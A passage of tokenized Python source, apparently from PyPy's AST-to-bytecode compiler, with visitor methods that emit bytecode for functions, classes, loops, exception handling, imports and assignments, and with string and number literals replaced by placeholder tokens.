space , name , tree , lineno , symbols , compile_info ) : <EOL> self . scope = symbols . find_scope ( tree ) <EOL> assemble . PythonCodeMaker . __init__ ( self , space , name , lineno , <EOL> self . 
scope , compile_info ) <EOL> self . symbols = symbols <EOL> self . frame_blocks = [ ] <EOL> self . interactive = False <EOL> self . temporary_name_counter = <NUM_LIT:1> <EOL> self . _compile ( tree ) <EOL> def _compile ( self , tree ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def current_temporary_name ( self ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" % ( self . temporary_name_counter , ) <EOL> self . temporary_name_counter += <NUM_LIT:1> <EOL> assert self . scope . lookup ( name ) != symtable . SCOPE_UNKNOWN <EOL> return name <EOL> def sub_scope ( self , kind , name , node , lineno ) : <EOL> """<STR_LIT>""" <EOL> generator = kind ( self . space , name , node , lineno , self . symbols , <EOL> self . compile_info ) <EOL> return generator . assemble ( ) <EOL> def push_frame_block ( self , kind , block ) : <EOL> self . frame_blocks . append ( ( kind , block ) ) <EOL> def pop_frame_block ( self , kind , block ) : <EOL> actual_kind , old_block = self . frame_blocks . pop ( ) <EOL> assert actual_kind == kind and old_block is block , "<STR_LIT>" <EOL> def error ( self , msg , node ) : <EOL> raise SyntaxError ( msg , node . lineno , node . col_offset , <EOL> filename = self . compile_info . filename ) <EOL> def name_op ( self , identifier , ctx ) : <EOL> """<STR_LIT>""" <EOL> scope = self . scope . lookup ( identifier ) <EOL> op = ops . NOP <EOL> container = self . names <EOL> if scope == symtable . SCOPE_LOCAL : <EOL> if self . scope . can_be_optimized : <EOL> container = self . var_names <EOL> op = name_ops_fast ( ctx ) <EOL> elif scope == symtable . SCOPE_FREE : <EOL> op = name_ops_deref ( ctx ) <EOL> container = self . free_vars <EOL> elif scope == symtable . SCOPE_CELL : <EOL> try : <EOL> op = name_ops_deref ( ctx ) <EOL> except KeyError : <EOL> assert ctx == ast . Del <EOL> raise SyntaxError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( identifier , ) ) <EOL> container = self . cell_vars <EOL> elif scope == symtable . 
SCOPE_GLOBAL_IMPLICIT : <EOL> if self . scope . locals_fully_known : <EOL> op = name_ops_global ( ctx ) <EOL> elif scope == symtable . SCOPE_GLOBAL_EXPLICIT : <EOL> op = name_ops_global ( ctx ) <EOL> if op == ops . NOP : <EOL> op = name_ops_default ( ctx ) <EOL> self . emit_op_arg ( op , self . add_name ( container , identifier ) ) <EOL> def is_docstring ( self , node ) : <EOL> return isinstance ( node , ast . Expr ) and isinstance ( node . value , ast . Str ) <EOL> def _get_code_flags ( self ) : <EOL> return consts . CO_NEWLOCALS <EOL> def _handle_body ( self , body ) : <EOL> """<STR_LIT>""" <EOL> if body : <EOL> start = <NUM_LIT:0> <EOL> if self . is_docstring ( body [ <NUM_LIT:0> ] ) : <EOL> doc_expr = body [ <NUM_LIT:0> ] <EOL> assert isinstance ( doc_expr , ast . Expr ) <EOL> start = <NUM_LIT:1> <EOL> doc_expr . value . walkabout ( self ) <EOL> self . name_op ( "<STR_LIT>" , ast . Store ) <EOL> for i in range ( start , len ( body ) ) : <EOL> body [ i ] . walkabout ( self ) <EOL> return True <EOL> else : <EOL> return False <EOL> def visit_Module ( self , mod ) : <EOL> if not self . _handle_body ( mod . body ) : <EOL> self . first_lineno = self . lineno = <NUM_LIT:1> <EOL> def visit_Interactive ( self , mod ) : <EOL> self . interactive = True <EOL> self . visit_sequence ( mod . body ) <EOL> def visit_Expression ( self , mod ) : <EOL> self . add_none_to_final_return = False <EOL> mod . body . walkabout ( self ) <EOL> def _make_function ( self , code , num_defaults = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> code_index = self . add_const ( code ) <EOL> if code . co_freevars : <EOL> for free in code . co_freevars : <EOL> free_scope = self . scope . lookup ( free ) <EOL> if free_scope == symtable . SCOPE_CELL : <EOL> index = self . cell_vars [ free ] <EOL> else : <EOL> index = self . free_vars [ free ] <EOL> self . emit_op_arg ( ops . LOAD_CLOSURE , index ) <EOL> self . emit_op_arg ( ops . BUILD_TUPLE , len ( code . co_freevars ) ) <EOL> self . emit_op_arg ( ops . 
LOAD_CONST , code_index ) <EOL> self . emit_op_arg ( ops . MAKE_CLOSURE , num_defaults ) <EOL> else : <EOL> self . emit_op_arg ( ops . LOAD_CONST , code_index ) <EOL> self . emit_op_arg ( ops . MAKE_FUNCTION , num_defaults ) <EOL> def visit_FunctionDef ( self , func ) : <EOL> self . update_position ( func . lineno , True ) <EOL> if func . decorators : <EOL> self . visit_sequence ( func . decorators ) <EOL> if func . args . defaults : <EOL> self . visit_sequence ( func . args . defaults ) <EOL> num_defaults = len ( func . args . defaults ) <EOL> else : <EOL> num_defaults = <NUM_LIT:0> <EOL> code = self . sub_scope ( FunctionCodeGenerator , func . name , func , <EOL> func . lineno ) <EOL> self . _make_function ( code , num_defaults ) <EOL> if func . decorators : <EOL> for i in range ( len ( func . decorators ) ) : <EOL> self . emit_op_arg ( ops . CALL_FUNCTION , <NUM_LIT:1> ) <EOL> self . name_op ( func . name , ast . Store ) <EOL> def visit_Lambda ( self , lam ) : <EOL> self . update_position ( lam . lineno ) <EOL> if lam . args . defaults : <EOL> self . visit_sequence ( lam . args . defaults ) <EOL> default_count = len ( lam . args . defaults ) <EOL> else : <EOL> default_count = <NUM_LIT:0> <EOL> code = self . sub_scope ( LambdaCodeGenerator , "<STR_LIT>" , lam , lam . lineno ) <EOL> self . _make_function ( code , default_count ) <EOL> def visit_ClassDef ( self , cls ) : <EOL> self . update_position ( cls . lineno , True ) <EOL> self . load_const ( self . space . wrap ( cls . name ) ) <EOL> if cls . bases : <EOL> bases_count = len ( cls . bases ) <EOL> self . visit_sequence ( cls . bases ) <EOL> else : <EOL> bases_count = <NUM_LIT:0> <EOL> self . emit_op_arg ( ops . BUILD_TUPLE , bases_count ) <EOL> code = self . sub_scope ( ClassCodeGenerator , cls . name , cls , cls . lineno ) <EOL> self . _make_function ( code , <NUM_LIT:0> ) <EOL> self . emit_op_arg ( ops . CALL_FUNCTION , <NUM_LIT:0> ) <EOL> self . emit_op ( ops . BUILD_CLASS ) <EOL> self . name_op ( cls . 
name , ast . Store ) <EOL> def _op_for_augassign ( self , op ) : <EOL> if op == ast . Div : <EOL> if self . compile_info . flags & consts . CO_FUTURE_DIVISION : <EOL> return ops . INPLACE_TRUE_DIVIDE <EOL> else : <EOL> return ops . INPLACE_DIVIDE <EOL> return inplace_operations ( op ) <EOL> def visit_AugAssign ( self , assign ) : <EOL> self . update_position ( assign . lineno , True ) <EOL> target = assign . target <EOL> if isinstance ( target , ast . Attribute ) : <EOL> attr = ast . Attribute ( target . value , target . attr , ast . AugLoad , <EOL> target . lineno , target . col_offset ) <EOL> attr . walkabout ( self ) <EOL> assign . value . walkabout ( self ) <EOL> self . emit_op ( self . _op_for_augassign ( assign . op ) ) <EOL> attr . ctx = ast . AugStore <EOL> attr . walkabout ( self ) <EOL> elif isinstance ( target , ast . Subscript ) : <EOL> sub = ast . Subscript ( target . value , target . slice , ast . AugLoad , <EOL> target . lineno , target . col_offset ) <EOL> sub . walkabout ( self ) <EOL> assign . value . walkabout ( self ) <EOL> self . emit_op ( self . _op_for_augassign ( assign . op ) ) <EOL> sub . ctx = ast . AugStore <EOL> sub . walkabout ( self ) <EOL> elif isinstance ( target , ast . Name ) : <EOL> self . name_op ( target . id , ast . Load ) <EOL> assign . value . walkabout ( self ) <EOL> self . emit_op ( self . _op_for_augassign ( assign . op ) ) <EOL> self . name_op ( target . id , ast . Store ) <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> def visit_Assert ( self , asrt ) : <EOL> self . update_position ( asrt . lineno ) <EOL> end = self . new_block ( ) <EOL> asrt . test . accept_jump_if ( self , True , end ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_op_name ( ops . LOAD_GLOBAL , self . names , "<STR_LIT>" ) <EOL> if asrt . msg : <EOL> asrt . msg . walkabout ( self ) <EOL> self . emit_op_arg ( ops . RAISE_VARARGS , <NUM_LIT:2> ) <EOL> else : <EOL> self . emit_op_arg ( ops . 
RAISE_VARARGS , <NUM_LIT:1> ) <EOL> self . use_next_block ( end ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> def _binop ( self , op ) : <EOL> if op == ast . Div : <EOL> if self . compile_info . flags & consts . CO_FUTURE_DIVISION : <EOL> return ops . BINARY_TRUE_DIVIDE <EOL> else : <EOL> return ops . BINARY_DIVIDE <EOL> return binary_operations ( op ) <EOL> def visit_BinOp ( self , binop ) : <EOL> self . update_position ( binop . lineno ) <EOL> binop . left . walkabout ( self ) <EOL> binop . right . walkabout ( self ) <EOL> self . emit_op ( self . _binop ( binop . op ) ) <EOL> def visit_Return ( self , ret ) : <EOL> self . update_position ( ret . lineno , True ) <EOL> if ret . value : <EOL> ret . value . walkabout ( self ) <EOL> else : <EOL> self . load_const ( self . space . w_None ) <EOL> self . emit_op ( ops . RETURN_VALUE ) <EOL> def visit_Print ( self , pr ) : <EOL> self . update_position ( pr . lineno , True ) <EOL> have_dest = bool ( pr . dest ) <EOL> if have_dest : <EOL> pr . dest . walkabout ( self ) <EOL> if pr . values : <EOL> for value in pr . values : <EOL> if have_dest : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> value . walkabout ( self ) <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> self . emit_op ( ops . PRINT_ITEM_TO ) <EOL> else : <EOL> value . walkabout ( self ) <EOL> self . emit_op ( ops . PRINT_ITEM ) <EOL> if pr . nl : <EOL> if have_dest : <EOL> self . emit_op ( ops . PRINT_NEWLINE_TO ) <EOL> else : <EOL> self . emit_op ( ops . PRINT_NEWLINE ) <EOL> elif have_dest : <EOL> self . emit_op ( ops . POP_TOP ) <EOL> def visit_Delete ( self , delete ) : <EOL> self . update_position ( delete . lineno , True ) <EOL> self . visit_sequence ( delete . targets ) <EOL> def visit_If ( self , if_ ) : <EOL> self . update_position ( if_ . lineno , True ) <EOL> end = self . new_block ( ) <EOL> test_constant = if_ . test . as_constant_truth ( self . space ) <EOL> if test_constant == optimize . CONST_FALSE : <EOL> if if_ . orelse : <EOL> self . 
visit_sequence ( if_ . orelse ) <EOL> elif test_constant == optimize . CONST_TRUE : <EOL> self . visit_sequence ( if_ . body ) <EOL> else : <EOL> next = self . new_block ( ) <EOL> if_ . test . accept_jump_if ( self , False , next ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . visit_sequence ( if_ . body ) <EOL> self . emit_jump ( ops . JUMP_FORWARD , end ) <EOL> self . use_next_block ( next ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> if if_ . orelse : <EOL> self . visit_sequence ( if_ . orelse ) <EOL> self . use_next_block ( end ) <EOL> def visit_Break ( self , br ) : <EOL> self . update_position ( br . lineno , True ) <EOL> for f_block in self . frame_blocks : <EOL> if f_block [ <NUM_LIT:0> ] == F_BLOCK_LOOP : <EOL> break <EOL> else : <EOL> self . error ( "<STR_LIT>" , br ) <EOL> self . emit_op ( ops . BREAK_LOOP ) <EOL> def visit_Continue ( self , cont ) : <EOL> self . update_position ( cont . lineno , True ) <EOL> if not self . frame_blocks : <EOL> self . error ( "<STR_LIT>" , cont ) <EOL> current_block , block = self . frame_blocks [ - <NUM_LIT:1> ] <EOL> if current_block == F_BLOCK_LOOP : <EOL> self . emit_jump ( ops . JUMP_ABSOLUTE , block , True ) <EOL> elif current_block == F_BLOCK_EXCEPT or current_block == F_BLOCK_FINALLY : <EOL> for i in range ( len ( self . frame_blocks ) - <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> f_type , block = self . frame_blocks [ i ] <EOL> if f_type == F_BLOCK_LOOP : <EOL> self . emit_jump ( ops . CONTINUE_LOOP , block , True ) <EOL> break <EOL> if self . frame_blocks [ i ] [ <NUM_LIT:0> ] == F_BLOCK_FINALLY_END : <EOL> self . error ( "<STR_LIT>" "<STR_LIT>" , <EOL> cont ) <EOL> else : <EOL> self . error ( "<STR_LIT>" , cont ) <EOL> elif current_block == F_BLOCK_FINALLY_END : <EOL> self . error ( "<STR_LIT>" , cont ) <EOL> def visit_For ( self , fr ) : <EOL> self . update_position ( fr . lineno , True ) <EOL> start = self . new_block ( ) <EOL> cleanup = self . new_block ( ) <EOL> end = self . 
new_block ( ) <EOL> self . emit_jump ( ops . SETUP_LOOP , end ) <EOL> self . push_frame_block ( F_BLOCK_LOOP , start ) <EOL> fr . iter . walkabout ( self ) <EOL> self . emit_op ( ops . GET_ITER ) <EOL> self . use_next_block ( start ) <EOL> self . lineno_set = False <EOL> self . emit_jump ( ops . FOR_ITER , cleanup ) <EOL> fr . target . walkabout ( self ) <EOL> self . visit_sequence ( fr . body ) <EOL> self . emit_jump ( ops . JUMP_ABSOLUTE , start , True ) <EOL> self . use_next_block ( cleanup ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_LOOP , start ) <EOL> if fr . orelse : <EOL> self . visit_sequence ( fr . orelse ) <EOL> self . use_next_block ( end ) <EOL> def visit_While ( self , wh ) : <EOL> self . update_position ( wh . lineno , True ) <EOL> test_constant = wh . test . as_constant_truth ( self . space ) <EOL> if test_constant == optimize . CONST_FALSE : <EOL> if wh . orelse : <EOL> self . visit_sequence ( wh . orelse ) <EOL> else : <EOL> end = self . new_block ( ) <EOL> anchor = None <EOL> if test_constant == optimize . CONST_NOT_CONST : <EOL> anchor = self . new_block ( ) <EOL> self . emit_jump ( ops . SETUP_LOOP , end ) <EOL> loop = self . new_block ( ) <EOL> self . push_frame_block ( F_BLOCK_LOOP , loop ) <EOL> self . use_next_block ( loop ) <EOL> if test_constant == optimize . CONST_NOT_CONST : <EOL> self . lineno_set = False <EOL> wh . test . accept_jump_if ( self , False , anchor ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . visit_sequence ( wh . body ) <EOL> self . emit_jump ( ops . JUMP_ABSOLUTE , loop , True ) <EOL> if test_constant == optimize . CONST_NOT_CONST : <EOL> self . use_next_block ( anchor ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_LOOP , loop ) <EOL> if wh . orelse : <EOL> self . visit_sequence ( wh . orelse ) <EOL> self . use_next_block ( end ) <EOL> def visit_TryExcept ( self , te ) : <EOL> self . 
update_position ( te . lineno , True ) <EOL> exc = self . new_block ( ) <EOL> otherwise = self . new_block ( ) <EOL> end = self . new_block ( ) <EOL> self . emit_jump ( ops . SETUP_EXCEPT , exc ) <EOL> body = self . use_next_block ( ) <EOL> self . push_frame_block ( F_BLOCK_EXCEPT , body ) <EOL> self . visit_sequence ( te . body ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_EXCEPT , body ) <EOL> self . emit_jump ( ops . JUMP_FORWARD , otherwise ) <EOL> self . use_next_block ( exc ) <EOL> for handler in te . handlers : <EOL> assert isinstance ( handler , ast . excepthandler ) <EOL> self . update_position ( handler . lineno , True ) <EOL> next_except = self . new_block ( ) <EOL> if handler . type : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> handler . type . walkabout ( self ) <EOL> self . emit_op_arg ( ops . COMPARE_OP , <NUM_LIT:10> ) <EOL> self . emit_jump ( ops . JUMP_IF_FALSE , next_except ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> if handler . name : <EOL> handler . name . walkabout ( self ) <EOL> else : <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . visit_sequence ( handler . body ) <EOL> self . emit_jump ( ops . JUMP_FORWARD , end ) <EOL> self . use_next_block ( next_except ) <EOL> if handler . type : <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_op ( ops . END_FINALLY ) <EOL> self . use_next_block ( otherwise ) <EOL> if te . orelse : <EOL> self . visit_sequence ( te . orelse ) <EOL> self . use_next_block ( end ) <EOL> def visit_TryFinally ( self , tf ) : <EOL> self . update_position ( tf . lineno , True ) <EOL> end = self . new_block ( ) <EOL> self . emit_jump ( ops . SETUP_FINALLY , end ) <EOL> body = self . use_next_block ( ) <EOL> self . push_frame_block ( F_BLOCK_FINALLY , body ) <EOL> self . visit_sequence ( tf . body ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . 
pop_frame_block ( F_BLOCK_FINALLY , body ) <EOL> self . load_const ( self . space . w_None ) <EOL> self . use_next_block ( end ) <EOL> self . push_frame_block ( F_BLOCK_FINALLY_END , end ) <EOL> self . visit_sequence ( tf . finalbody ) <EOL> self . emit_op ( ops . END_FINALLY ) <EOL> self . pop_frame_block ( F_BLOCK_FINALLY_END , end ) <EOL> def _import_as ( self , alias ) : <EOL> source_name = alias . name <EOL> dot = source_name . find ( "<STR_LIT:.>" ) <EOL> if dot > <NUM_LIT:0> : <EOL> while True : <EOL> start = dot + <NUM_LIT:1> <EOL> dot = source_name . find ( "<STR_LIT:.>" , start ) <EOL> if dot < <NUM_LIT:0> : <EOL> end = len ( source_name ) <EOL> else : <EOL> end = dot <EOL> attr = source_name [ start : end ] <EOL> self . emit_op_name ( ops . LOAD_ATTR , self . names , attr ) <EOL> if dot < <NUM_LIT:0> : <EOL> break <EOL> self . name_op ( alias . asname , ast . Store ) <EOL> def visit_Import ( self , imp ) : <EOL> self . update_position ( imp . lineno , True ) <EOL> for alias in imp . names : <EOL> assert isinstance ( alias , ast . alias ) <EOL> if self . compile_info . flags & consts . CO_FUTURE_ABSOLUTE_IMPORT : <EOL> level = <NUM_LIT:0> <EOL> else : <EOL> level = - <NUM_LIT:1> <EOL> self . load_const ( self . space . wrap ( level ) ) <EOL> self . load_const ( self . space . w_None ) <EOL> self . emit_op_name ( ops . IMPORT_NAME , self . names , alias . name ) <EOL> if alias . asname : <EOL> self . _import_as ( alias ) <EOL> else : <EOL> dot = alias . name . find ( "<STR_LIT:.>" ) <EOL> if dot < <NUM_LIT:0> : <EOL> store_name = alias . name <EOL> else : <EOL> store_name = alias . name [ : dot ] <EOL> self . name_op ( store_name , ast . Store ) <EOL> def visit_ImportFrom ( self , imp ) : <EOL> self . update_position ( imp . lineno , True ) <EOL> space = self . space <EOL> first = imp . names [ <NUM_LIT:0> ] <EOL> assert isinstance ( first , ast . alias ) <EOL> star_import = len ( imp . names ) == <NUM_LIT:1> and first . 
name == "<STR_LIT:*>" <EOL> if imp . module == "<STR_LIT>" : <EOL> last_line , last_offset = self . compile_info . last_future_import <EOL> if imp . lineno > last_line or imp . lineno == last_line and imp . col_offset > last_offset : <EOL> self . error ( "<STR_LIT>" "<STR_LIT>" , imp ) <EOL> if star_import : <EOL> self . error ( "<STR_LIT>" , imp ) <EOL> for alias in imp . names : <EOL> assert isinstance ( alias , ast . alias ) <EOL> if alias . name not in future . futureFlags_2_5 . compiler_features : <EOL> if alias . name == "<STR_LIT>" : <EOL> self . error ( "<STR_LIT>" , imp ) <EOL> self . error ( "<STR_LIT>" % <EOL> ( alias . name , ) , imp ) <EOL> if imp . level == <NUM_LIT:0> and not self . compile_info . flags & consts . CO_FUTURE_ABSOLUTE_IMPORT : <EOL> level = - <NUM_LIT:1> <EOL> else : <EOL> level = imp . level <EOL> self . load_const ( space . wrap ( level ) ) <EOL> names_w = [ None ] * len ( imp . names ) <EOL> for i in range ( len ( imp . names ) ) : <EOL> alias = imp . names [ i ] <EOL> assert isinstance ( alias , ast . alias ) <EOL> names_w [ i ] = space . wrap ( alias . name ) <EOL> self . load_const ( space . newtuple ( names_w ) ) <EOL> if imp . module : <EOL> mod_name = imp . module <EOL> else : <EOL> mod_name = "<STR_LIT>" <EOL> self . emit_op_name ( ops . IMPORT_NAME , self . names , mod_name ) <EOL> if star_import : <EOL> self . emit_op ( ops . IMPORT_STAR ) <EOL> else : <EOL> for alias in imp . names : <EOL> assert isinstance ( alias , ast . alias ) <EOL> self . emit_op_name ( ops . IMPORT_FROM , self . names , alias . name ) <EOL> if alias . asname : <EOL> store_name = alias . asname <EOL> else : <EOL> store_name = alias . name <EOL> self . name_op ( store_name , ast . Store ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> def visit_Assign ( self , assign ) : <EOL> self . update_position ( assign . lineno , True ) <EOL> if self . _optimize_unpacking ( assign ) : <EOL> return <EOL> assign . value . 
walkabout ( self ) <EOL> duplications = len ( assign . targets ) - <NUM_LIT:1> <EOL> for i in range ( len ( assign . targets ) ) : <EOL> if i < duplications : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> assign . targets [ i ] . walkabout ( self ) <EOL> def _optimize_unpacking ( self , assign ) : <EOL> """<STR_LIT>""" <EOL> if len ( assign . targets ) != <NUM_LIT:1> : <EOL> return False <EOL> targets = assign . targets [ <NUM_LIT:0> ] . as_node_list ( self . space ) <EOL> if targets is None : <EOL> return False <EOL> values = assign . value . as_node_list ( self . space ) <EOL> if values is None : <EOL> return False <EOL> targets_count = len ( targets ) <EOL> values_count = len ( values ) <EOL> if targets_count != values_count : <EOL> return False <EOL> for target in targets : <EOL> if not isinstance ( target , ast . Name ) : <EOL> break <EOL> else : <EOL> self . visit_sequence ( values ) <EOL> seen_names = { } <EOL> for i in range ( targets_count - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> target = targets [ i ] <EOL> assert isinstance ( target , ast . Name ) <EOL> if target . id not in seen_names : <EOL> seen_names [ target . id ] = True <EOL> self . name_op ( target . id , ast . Store ) <EOL> else : <EOL> self . emit_op ( ops . POP_TOP ) <EOL> return True <EOL> if values_count > <NUM_LIT:3> : <EOL> return False <EOL> self . visit_sequence ( values ) <EOL> if values_count == <NUM_LIT:2> : <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> elif values_count == <NUM_LIT:3> : <EOL> self . emit_op ( ops . ROT_THREE ) <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> self . visit_sequence ( targets ) <EOL> return True <EOL> def visit_With ( self , wih ) : <EOL> self . update_position ( wih . lineno , True ) <EOL> body_block = self . new_block ( ) <EOL> cleanup = self . new_block ( ) <EOL> exit_storage = self . current_temporary_name ( ) <EOL> temp_result = None <EOL> if wih . optional_vars : <EOL> temp_result = self . current_temporary_name ( ) <EOL> wih . 
context_expr . walkabout ( self ) <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> self . emit_op_name ( ops . LOAD_ATTR , self . names , "<STR_LIT>" ) <EOL> self . name_op ( exit_storage , ast . Store ) <EOL> self . emit_op_name ( ops . LOAD_ATTR , self . names , "<STR_LIT>" ) <EOL> self . emit_op_arg ( ops . CALL_FUNCTION , <NUM_LIT:0> ) <EOL> if wih . optional_vars : <EOL> self . name_op ( temp_result , ast . Store ) <EOL> else : <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_jump ( ops . SETUP_FINALLY , cleanup ) <EOL> self . use_next_block ( body_block ) <EOL> self . push_frame_block ( F_BLOCK_FINALLY , body_block ) <EOL> if wih . optional_vars : <EOL> self . name_op ( temp_result , ast . Load ) <EOL> self . name_op ( temp_result , ast . Del ) <EOL> wih . optional_vars . walkabout ( self ) <EOL> self . visit_sequence ( wih . body ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_FINALLY , body_block ) <EOL> self . load_const ( self . space . w_None ) <EOL> self . use_next_block ( cleanup ) <EOL> self . push_frame_block ( F_BLOCK_FINALLY_END , cleanup ) <EOL> self . name_op ( exit_storage , ast . Load ) <EOL> self . name_op ( exit_storage , ast . Del ) <EOL> self . emit_op ( ops . WITH_CLEANUP ) <EOL> self . emit_op ( ops . END_FINALLY ) <EOL> self . pop_frame_block ( F_BLOCK_FINALLY_END , cleanup ) <EOL> def visit_Raise ( self , rais ) : <EOL> self . update_position ( rais . lineno , True ) <EOL> arg = <NUM_LIT:0> <EOL> if rais . type : <EOL> rais . type . walkabout ( self ) <EOL> arg += <NUM_LIT:1> <EOL> if rais . inst : <EOL> rais . inst . walkabout ( self ) <EOL> arg += <NUM_LIT:1> <EOL> if rais . tback : <EOL> rais . tback . walkabout ( self ) <EOL> arg += <NUM_LIT:1> <EOL> self . emit_op_arg ( ops . RAISE_VARARGS , arg ) <EOL> def visit_Exec ( self , exc ) : <EOL> self . update_position ( exc . lineno , True ) <EOL> exc . body . walkabout ( self ) <EOL> if exc . globals : <EOL> exc . globals . 
walkabout ( self ) <EOL> if exc . locals : <EOL> exc . locals . walkabout ( self ) <EOL> else : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> else : <EOL> self . load_const ( self . space . w_None ) <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> self . emit_op ( ops . EXEC_STMT ) <EOL> def visit_Global ( self , glob ) : <EOL> pass <EOL> def visit_Pass ( self , pas ) : <EOL> self . update_position ( pas . lineno , True ) <EOL> def visit_Expr ( self , expr ) : <EOL> self . update_position ( expr . lineno , True ) <EOL> if self . interactive : <EOL> expr . value . walkabout ( self ) <EOL> self . emit_op ( ops . PRINT_EXPR ) <EOL> elif not expr . value . constant : <EOL> expr . value . walkabout ( self ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> def visit_Yield ( self , yie ) : <EOL> self . update_position ( yie . lineno ) <EOL> if yie . value : <EOL> yie . value . walkabout ( self ) <EOL> else : <EOL> self . load_const ( self . space . w_None ) <EOL> self . emit_op ( ops . YIELD_VALUE ) <EOL> def visit_Num ( self , num ) : <EOL> self . update_position ( num . lineno ) <EOL> self . load_const ( num . n ) <EOL> def visit_Str ( self , string ) : <EOL> self . update_position ( string . lineno ) <EOL> self . load_const ( string . s ) <EOL> def visit_Const ( self , const ) : <EOL> self . update_position ( const . lineno ) <EOL> space = self . space <EOL> value = const . value <EOL> if space . is_true ( space . isinstance ( value , space . w_tuple ) ) : <EOL> length = space . int_w ( space . len ( value ) ) <EOL> key_w = [ None ] * ( length + <NUM_LIT:2> ) <EOL> key_w [ <NUM_LIT:0> ] = value <EOL> for i in range ( <NUM_LIT:1> , length + <NUM_LIT:1> ) : <EOL> key_w [ i ] = space . type ( space . getitem ( value , space . wrap ( i - <NUM_LIT:1> ) ) ) <EOL> key_w [ - <NUM_LIT:1> ] = space . w_tuple <EOL> self . load_const ( value , space . newtuple ( key_w ) ) <EOL> else : <EOL> self . load_const ( value ) <EOL> def visit_UnaryOp ( self , op ) : <EOL> self . 
update_position ( op . lineno ) <EOL> op . operand . walkabout ( self ) <EOL> self . emit_op ( unary_operations ( op . op ) ) <EOL> def visit_BoolOp ( self , op ) : <EOL> self . update_position ( op . lineno ) <EOL> if op . op == ast . And : <EOL> instr = ops . JUMP_IF_FALSE <EOL> else : <EOL> instr = ops . JUMP_IF_TRUE <EOL> end = self . new_block ( ) <EOL> for value in op . values [ : - <NUM_LIT:1> ] : <EOL> value . walkabout ( self ) <EOL> self . emit_jump ( instr , end ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> op . values [ - <NUM_LIT:1> ] . walkabout ( self ) <EOL> self . use_next_block ( end ) <EOL> def visit_Compare ( self , comp ) : <EOL> self . update_position ( comp . lineno ) <EOL> comp . left . walkabout ( self ) <EOL> ops_count = len ( comp . ops ) <EOL> cleanup = None <EOL> if ops_count > <NUM_LIT:1> : <EOL> cleanup = self . new_block ( ) <EOL> comp . comparators [ <NUM_LIT:0> ] . walkabout ( self ) <EOL> for i in range ( <NUM_LIT:1> , ops_count ) : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> self . emit_op ( ops . ROT_THREE ) <EOL> op_kind = compare_operations ( comp . ops [ i - <NUM_LIT:1> ] ) <EOL> self . emit_op_arg ( ops . COMPARE_OP , op_kind ) <EOL> self . emit_jump ( ops . JUMP_IF_FALSE , cleanup ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> if i < ( ops_count - <NUM_LIT:1> ) : <EOL> comp . comparators [ i ] . walkabout ( self ) <EOL> comp . comparators [ - <NUM_LIT:1> ] . walkabout ( self ) <EOL> last_kind = compare_operations ( comp . ops [ - <NUM_LIT:1> ] ) <EOL> self . emit_op_arg ( ops . COMPARE_OP , last_kind ) <EOL> if ops_count > <NUM_LIT:1> : <EOL> end = self . new_block ( ) <EOL> self . emit_jump ( ops . JUMP_FORWARD , end ) <EOL> self . use_next_block ( cleanup ) <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . use_next_block ( end ) <EOL> def visit_IfExp ( self , ifexp ) : <EOL> self . update_position ( ifexp . lineno ) <EOL> end = self . new_block ( ) <EOL> otherwise = self . 
new_block ( ) <EOL> ifexp . test . accept_jump_if ( self , False , otherwise ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> ifexp . body . walkabout ( self ) <EOL> self . emit_jump ( ops . JUMP_FORWARD , end ) <EOL> self . use_next_block ( otherwise ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> ifexp . orelse . walkabout ( self ) <EOL> self . use_next_block ( end ) <EOL> def visit_Tuple ( self , tup ) : <EOL> self . update_position ( tup . lineno ) <EOL> if tup . elts : <EOL> elt_count = len ( tup . elts ) <EOL> else : <EOL> elt_count = <NUM_LIT:0> <EOL> if tup . ctx == ast . Store : <EOL> self . emit_op_arg ( ops . UNPACK_SEQUENCE , elt_count ) <EOL> if elt_count : <EOL> self . visit_sequence ( tup . elts ) <EOL> if tup . ctx == ast . Load : <EOL> self . emit_op_arg ( ops . BUILD_TUPLE , elt_count ) <EOL> def visit_List ( self , l ) : <EOL> self . update_position ( l . lineno ) <EOL> if l . elts : <EOL> elt_count = len ( l . elts ) <EOL> else : <EOL> elt_count = 